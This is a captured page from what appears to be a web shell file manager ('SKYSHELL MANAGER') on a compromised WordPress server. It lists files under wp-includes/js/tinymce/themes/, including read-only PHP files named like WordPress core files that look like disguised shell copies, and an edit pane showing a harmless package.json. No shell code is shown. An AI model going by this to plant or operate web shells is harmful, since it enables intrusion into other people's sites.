📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@types/estraverse", "version": "5.1.1", "description": "TypeScript definitions for estraverse", "homepage": "https://github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/estraverse", "license": "MIT", "contributors": [ { "name": "Sanex3339", "url": "https://github.com/sanex3339", "githubUsername": "sanex3339" }, { "name": "Jason Kwok", "url": "https://github.com/JasonHK", "githubUsername": "JasonHK" } ], "main": "", "types": "index.d.ts", "repository": { "type": "git", "url": "https://github.com/DefinitelyTyped/DefinitelyTyped.git", "directory": "types/estraverse" }, "scripts": {}, "dependencies": { "@types/estree": "*" }, "typesPublisherContentHash": "2ab60180a2267ecaa99c81c68e9dd271088dfe6b66cc1a755f194ad3a328e46d", "typeScriptVersion": "3.6" }
Save